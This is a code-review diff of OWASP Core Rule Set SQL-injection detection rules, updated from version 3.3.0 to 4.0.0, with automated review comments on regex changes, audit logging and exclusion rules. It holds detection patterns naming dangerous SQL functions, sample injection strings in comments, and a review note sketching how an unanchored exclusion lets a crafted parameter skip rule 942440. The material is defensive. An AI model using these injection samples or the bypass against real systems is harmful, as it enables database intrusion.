@@ -929,17 +1101,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942380.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942380.data +# Regular expression generated from regex-assembly/942380.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942380 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\b(?:having\b ?(?:[\'\"][^=]{1,10}[\'\" ?[=<>]+|\d{1,10} ?[=<>]+)|(?i:having)\b\s+(?:'[^=]{1,10}'|\d{1,10})\s*?[=<>])|exists\s(?:s(?:elect\S(?:if(?:null)?\s\(|concat|top)|ystem\s\()|\b(?i:having)\b\s+\d{1,10}|'[^=]{1,10}'|\sselect)|(?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3})|(?i:\bcreate\s+?table.{0,20}?\()|(?i:\blike\W*?char\W*?\()|(?i:select.*?case)|(?i:from.*?limit)|(?i:\bexecute\()|(?i:order\sby))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:having\b(?:[\s\v]+(?:[0-9]{1,10}|'[^=]{1,10}')[\s\v]*?[<->]| ?(?:[0-9]{1,10} ?[<->]+|[\"'][^=]{1,10}[ 
\"'<-\?\[]+))|ex(?:ecute(?:\(|[\s\v]{1,5}[\$\.0-9A-Z_a-z]{1,5}[\s\v]{0,3})|ists[\s\v]*?\([\s\v]*?select\b)|(?:create[\s\v]+?table.{0,20}?|like[^0-9A-Z_a-z]*?char[^0-9A-Z_a-z]*?)\()|select.*?case|from.*?limit|order[\s\v]by|exists[\s\v](?:[\s\v]select|s(?:elect[^\s\v](?:if(?:null)?[\s\v]\(|top|concat)|ystem[\s\v]\()|\bhaving\b[\s\v]+[0-9]{1,10}|'[^=]{1,10}')" \ "id:942380,\ phase:2,\ block,\ 
@@ -955,18 +1127,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
-# Regexp generated from util/regexp-assemble/regexp-942390.data using Regexp::Assemble.
-# To rebuild the regexp:
-# cd util/regexp-assemble
-# ./regexp-assemble.pl regexp-942390.data
+# Regular expression generated from regex-assembly/942390.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 942390
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\b(?:(?i:xor)\b\s+(?:'[^=]{1,10}'(?:\s*?[=<>])?|\d{1,10}(?:\s*?[=<>])?)|(?i:or)\b\s+(?:'[^=]{1,10}'(?:\s*?[=<>])?|\d{1,10}(?:\s*?[=<>])?))|(?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+)|(?i:'\s+xor\s+.{1,20}[+\-!<>=])|(?i:'\s+or\s+.{1,20}[+\-!<>=])|(?i:\bor\b ?\d{1,10} ?[=<>]+))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:or\b(?:[\s\v]?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"'])[\s\v]?[<->]+|[\s\v]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\v]*?[<->])?)|xor\b[\s\v]+(?:[0-9]{1,10}|'[^=]{1,10}')(?:[\s\v]*?[<->])?)|'[\s\v]+x?or[\s\v]+.{1,20}[!\+\-<->]" \
 "id:942390,\
 phase:2,\
 block,\
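Review bot: This hunk (and the following ones for 942400, 942410, 942470 and 942480) silently drops `ctl:auditLogParts=+E` from the PL2 rules, so a match no longer adds the response body to the audit-log entry; that part is what lets an analyst confirm whether an injection actually returned data rather than merely being attempted. If the removal is deliberate (predictable log volume, or because the directive was applied inconsistently across rules), say so in CHANGES and point operators at `SecAuditLogParts` to get part E back globally. The new 942390 expression also relaxes `or\b ?'...' ?[=<>]` to `or\b[\s\v]?...[\s\v]?[<->]+`, admitting a tab or vertical tab around the literal, which is a small widening worth a word in the rule comment. 942390's remaining actions are outside the hunk.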
@@ -982,21 +1153,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'capec/1000/152/248/66',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
-# Regexp generated from util/regexp-assemble/regexp-942400.data using Regexp::Assemble.
-# To rebuild the regexp:
-# cd util/regexp-assemble
-# ./regexp-assemble.pl regexp-942400.data
-# Note that after assemble an outer bracket with an ignore case flag is added
-# to the Regexp::Assemble output:
-# (?i:ASSEMBLE_OUTPUT)
+# Regular expression generated from regex-assembly/942400.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 942400
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\band\b(?:\s+(?:'[^=]{1,10}'(?:\s*?[=<>])?|\d{1,10}(?:\s*?[=<>])?)| ?(?:[\'\"][^=]{1,10}[\'\"]|\d{1,10}) ?[=<>]+))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\band\b(?:[\s\v]+(?:[0-9]{1,10}[\s\v]*?[<->]|'[^=]{1,10}')| ?(?:[0-9]{1,10}|[\"'][^=]{1,10}[\"']) ?[<->]+)" \
 "id:942400,\
 phase:2,\
 block,\
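Review bot: The numeric branch of 942400 changed from `\d{1,10}(?:\s*?[=<>])?` (comparison optional) to `[0-9]{1,10}[\s\v]*?[<->]` (comparison mandatory), so a bare `and 1` / `AND 7` no longer scores here, while the sibling 942390 in the previous hunk still matches `or 1` with the operator optional; the quoted branch merely drops its optional trailing operator, which only changes what `%{TX.0}` shows. If this is a deliberate false-positive reduction (prose like "2 and 3"), record it, e.g. `# 'and <number>' without a comparison operator is not matched (too common in prose); 'or <number>' is still caught by 942390.`; if it is not, the assembly input should be re-aligned with 942390. The rule's remaining actions are outside the hunk.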
@@ -1012,28 +1179,22 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # The former rule id 942410 was split into three new rules: 942410, 942470, 942480 # # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942410.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942410.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output. 
-# And a word boundary is added before and a non-word character with an opening bracket -# is added after the Regexp::Assemble output: -# (?i:\bASSEMBLE_OUTPUT\W*?\() -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:t(?:d(?:dev(?:_(?:sam|po)p)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(?:_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha[12]?|oundex|chema|ig?n|leep|pace|qrt)|i(?:s(?:_(?:ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|(?:free|used)_lock)|null)?|n(?:et(?:6_(?:aton|ntoa)|_(?:aton|ntoa))|s(?:ert|tr)|terval)?|f(?:null)?)|d(?:a(?:t(?:e(?:_(?:format|add|sub)|diff)?|abase)|y(?:of(?:month|week|year)|name)?)|e(?:(?:s_(?:de|en)cryp|faul)t|grees|code)|count|ump)|l(?:o(?:ca(?:l(?:timestamp)?|te)|g(?:10|2)?|ad_file|wer)|ast(?:_(?:insert_id|day))?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(?:time(?:stamp)?|date)|p(?:datexml|per)|uid(?:_short)?|case|ser)|r(?:a(?:wto(?:nhex(?:toraw)?|hex)|dians|nd)|e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|ight|trim|pad)|t(?:ime(?:_(?:format|to_sec)|stamp(?:diff|add)?|diff)?|o_(?:(?:second|day)s|base64|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(?:name)?|d)|d5)|f(?:i(?:eld(?:_in_set)?|nd_in_set)|rom_(?:unixtime|base64|days)|o(?:und_rows|rmat)|loor)|p(?:o(?:w(?:er)?|sition)|eriod_(?:diff|add)|rocedure_analyse|assword|g_sleep|i)|a(?:s(?:cii(?:str)?|in)|es_(?:de|en)crypt|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|b(?:i(?:t_(?:length|count|x?or|and)|n(?:_to_num)?)|enchmark)|e(?:x(?:tract(?:value)?|p(?:ort_set)?)|nc(?:rypt|ode)|lt)|g(?:r(?:oup_conca|eates)t|et_(?:format|lock))|v(?:a(?:r(?:_(?:sam|
po)p|iance)|lues)|ersion)|o(?:(?:ld_passwo)?rd|ct(?:et_length)?)|we(?:ek(?:ofyear|day)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|h(?:ex(?:toraw)?|our)|qu(?:arter|ote)|year(?:week)?|xmltype)\W*?\()" \ +# Regular expression generated from regex-assembly/942410.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942410 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:(?:b|co)s|dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:in|cii(?:str)?)|tan2?|vg)|b(?:enchmark|i(?:n(?:_to_num)?|t_(?:and|count|length|x?or)))|c(?:ast|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|o(?:alesce|ercibility|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|(?:un)?t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff)?)|y(?:name|of(?:month|week|year))?)|count|e(?:code|(?:faul|s_(?:de|en)cryp)t|grees)|ump)|e(?:lt|nc(?:ode|rypt)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:eld(?:_in_set)?|nd_in_set)|loor|o(?:rmat|und_rows)|rom_(?:base64|days|unixtime))|g(?:et_(?:format|lock)|r(?:eates|oup_conca)t)|h(?:ex(?:toraw)?|our)|i(?:f(?:null)?|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)?|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null)?)|l(?:ast(?:_(?:day|insert_id))?|case|e(?:(?:as|f)t|ngth)|n|o(?:ad_file|ca(?:l(?:timestamp)?|te)|g(?:10|2)?|wer)|pad|trim)|m(?:a(?:ke(?:date|_set)|ster_pos_wait|x)|d5|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:d|nth(?:name)?))|n(?:ame_const|o(?:t_in|w)|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:assword|eriod_(?:add|diff)|g_sleep|i|o(?:sition|w(?:er)?)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wto(?:hex|nhex(?:toraw)?))|e(?:lease_lock|p(?:eat|lace)|verse)|ight|o(?:und|w_count)|pad|trim)|s(?:chema|e(?:c(?:ond|_to_time)|ssion_user)|ha[1-2]?|ig?n|leep|ou
ndex|pace|qrt|t(?:d(?:dev(?:_(?:po|sam)p)?)?|r(?:cmp|_to_date))|u(?:b(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|m)|ys(?:date|tem_user))|t(?:an|ime(?:diff|_(?:format|to_sec)|stamp(?:add|diff)?)?|o_(?:base64|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|ix_timestamp)|p(?:datexml|per)|ser|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|v(?:a(?:lues|r(?:iance|_(?:po|sam)p))|ersion)|we(?:ek(?:day|ofyear)?|ight_string)|xmltype|year(?:week)?)[^0-9A-Z_a-z]*?\(" \ "id:942410,\ phase:2,\ block,\ 
@@ -1049,24 +1210,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # The former rule id 942410 was split into three new rules: 942410, 942470, 942480 # -# Regexp generated from util/regexp-assemble/regexp-942470.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942470.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942470.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942470 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|(?:servicecontro|cmdshel)l|e(?:xecresultset|numdsn)|ntsec(?:_enumdomains)?|terminate(?:_process)?|availablemedia|loginconfig|filelist|dirtree|makecab)|s(?:p_(?:(?:addextendedpro|sqlexe)c|p(?:assword|repare)|replwritetovarbin|is_srvrolemember|execute(?:sql)?|makewebtask|oacreate|help)|ql_(?:longvarchar|variant))|open(?:owa_util|rowset|query)|(?:n?varcha|tbcreato)r|autonomous_transaction|db(?:a_users|ms_java)|utl_(?:file|http)))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)" \ "id:942470,\ phase:2,\ block,\ 
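Review bot: `current_user` is new in the 942470 keyword list and, like every other alternative in this rule, carries no word boundary, while the rule targets `ARGS_NAMES` as well as values; a parameter named `current_user_id` or a value such as `current_user@example.com` now scores CRITICAL at PL2. The call form `current_user(` is already covered by 942410 (`rent_(?:date|time(?:stamp)?|user)` followed by `[^0-9A-Z_a-z]*?\(`), so if the aim is the bare identifier, constrain it in the assembly input, e.g. `(?<![0-9A-Z_a-z])current_user(?![0-9A-Z_a-z])`, and consider whether other short bare tokens such as `sp_help` want the same treatment. 942470's actions continue past the hunk.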
@@ -1082,24 +1239,20 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # The former rule id 942410 was split into three new rules: 942410, 942470, 942480 # -# Regexp generated from util/regexp-assemble/regexp-942480.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942480.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942480.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942480 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:\b(?:(?:s(?:elect\b.{1,100}?\b(?:(?:(?:length|count)\b.{1,100}?|.*?\bdump\b.*)\bfrom|to(?:p\b.{1,100}?\bfrom|_(?:numbe|cha)r)|(?:from\b.{1,100}?\bwher|data_typ)e|instr)|ys_context)|in(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)|u(?:nion\b.{1,100}?\bselect|tl_inaddr)|group\b.*?\bby\b.{1,100}?\bhaving|d(?:elete\b\W*?\bfrom|bms_\w+\.)|load\b\W*?\bdata\b.*?\binfile)\b|print\b\W*?\@\@)|(?:;\W*?\b(?:shutdown|drop)|collation\W*?\(a|\@\@version)\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\.|elete\b[^0-9A-Z_a-z]*?\bfrom)|(?:group\b.*?\bby\b.{1,100}?\bhav|overlay\b[^0-9A-Z_a-z]*?\(.*?\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\b[^0-9A-Z_a-z]*?\bjoin|sert\b[^0-9A-Z_a-z]*?\binto|to\b[^0-9A-Z_a-z]*?\b(?:dump|out)file)|load\b[^0-9A-Z_a-z]*?\bdata\b.*?\binfile|s(?:elect\b.{1,100}?\b(?:(?:.*?\bdump\b.*|(?:count|length)\b.{1,100}?)\bfrom|(?:data_typ|from\b.{1,100}?\bwher)e|instr|to(?:_(?:cha|numbe)r|p\b.{1,100}?\bfrom))|ys_context)|u(?:nion\b.{1,100}?\bselect|tl_inaddr))\b|print\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\(a|@@version|;[^0-9A-Z_a-z]*?\b(?:drop|shutdown))\b|'(?:dbo|msdasql|s(?:a|qloledb))'" \ "id:942480,\ phase:2,\ block,\ @@ -1115,11 +1268,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # 
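Review bot: 942480's target list gains the whole `REQUEST_HEADERS` collection, which includes the `Cookie` header, so the `!REQUEST_COOKIES:/__utm/` and `!REQUEST_COOKIES:/_pk_ref/` exclusions the same rule keeps are no longer effective for it — the raw `Cookie:` line is still inspected as `REQUEST_HEADERS:Cookie`, and a `_pk_ref` value containing `;drop` or `'sa'` will match anyway. If the intent is to cover Referer/User-Agent style headers, name them as 942370 does, or exclude the cookie header explicitly: `REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie|ARGS_NAMES|ARGS|XML:/*`. Either way the rule comment should say why this rule alone among the PL2 siblings looks at every header. The rest of 942480's actions is outside the hunk.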
@@ -1157,11 +1309,38 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ - setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" +# +# -=[ Exclusion rule for 942440 ]=- +# +# Prevent FPs against Facebook click identifier +# +SecRule ARGS_GET:fbclid "@rx [a-zA-Z0-9_-]{61,61}" \ + "id:942441,\ + phase:2,\ + pass,\ + t:none,t:urlDecodeUni,\ + nolog,\ + ctl:ruleRemoveTargetById=942440;ARGS:fbclid,\ + ver:'OWASP_CRS/4.0.0'" + +# +# -=[ Exclusion rule for 942440 ]=- +# +# Prevent FPs against Google click identifier +# +SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \ + "id:942442,\ + phase:2,\ + pass,\ + t:none,t:urlDecodeUni,\ + nolog,\ + ctl:ruleRemoveTargetById=942440;ARGS:gclid,\ + ver:'OWASP_CRS/4.0.0'" # # -=[ Detect SQL Comment Sequences ]=- @@ -1172,7 +1351,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ # DROP sampletable;-- # admin'-- # DROP/*comment*/sampletable -# DR/**/OP/*bypass blacklisting*/sampletable +# DR/**/OP/*bypass deny listing*/sampletable # SELECT/*avoid-spaces*/password/**/FROM/**/Members # SELECT /*!32302 1/0, */ 1 FROM tablename # ‘ or 1=1# 
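Review bot: The exclusion triggers 942441/942442 match `[a-zA-Z0-9_-]{61,61}` (and `{91,91}`) unanchored, so any `fbclid`/`gclid` value that merely contains a run of 61 (91) identifier characters — `fbclid=AAAA...(61 chars)'--` for instance — disables 942440 for that parameter; and because the check is on `ARGS_GET:fbclid` while the removal is `ARGS:fbclid`, a well-formed GET `fbclid` also lifts 942440 from a `fbclid` field in the POST body. Anchor the pattern so it describes the whole value, `SecRule ARGS_GET:fbclid "@rx ^[a-zA-Z0-9_-]{61}$" \` (and `^[a-zA-Z0-9_-]{91}$` for gclid), and make the removed target the variable that was actually validated, either by removing `ARGS_GET:fbclid` only (if `ruleRemoveTargetById` accepts it in the deployed engine) or by checking `ARGS:fbclid` in the trigger rule. `{61,61}` is just `{61}`.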
@@ -1185,7 +1364,21 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
 # 0/**/union/*!50000select*/table_name`foo`/**/
 # -------------------------
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:/\*!?|\*/|[';]--|--[\s\r\n\v\f]|--[^-]*?-|[^&-]#.*?[\s\r\n\v\f]|;?\\x00)" \
+# The chained rule is designed to prevent false positives by specifically
+# targeting JWT tokens. Starting with 'ey' targets JWT tokens, where the 'ey'
+# prefix corresponds to the beginning of the Base64-encoded header section.
+#
+# example:
+# $ echo '{"' | base64
+# eyIK
+#
+# Regular expressions generated from regex-assembly/942440.ra and regex-assembly/942440-chain1.ra.
+# To update the regular expressions run the following shell scripts
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 942440
+# crs-toolchain regex update 942440-chain1
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\v]|[^\-]*?-)|[^&\-]#.*?[\s\v]|;?\x00" \
 "id:942440,\
 phase:2,\
 block,\
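Review bot: The comment's `$ echo '{"' | base64` → `eyIK` example is misleading: the trailing `K` encodes the newline that `echo` appends, and a real JWT header begins `{"alg"`, which encodes to `eyJhbGci`, not `eyI`. Use `$ printf '{"' | base64` → `eyI=`, or better `$ printf '{"alg"' | base64` → `eyJhbGci`, and say why the loose `ey` prefix is still used. The comment should also state plainly that the chained exclusion allow-lists values *shaped* like a JWT (three dot-separated base64url runs), not verified tokens, and that such values remain visible to the other 942xxx rules; the rule's `capture`, transformations and `chain` actions are outside this hunk.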
@@ -1201,15 +1394,21 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + chain" + SecRule MATCHED_VARS "!@rx ^ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.[\-0-9A-Z_a-z]+$" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" # # -=[ SQL Hex Evasion Methods ]=- # +# Hex encoding detection: +# (?i:\b0x[a-f\d]{3,}) will match any 3 or more hex bytes after "0x", together forming a hexadecimal payload(e.g 0xf00, 0xf00d and so on) +# SecRule 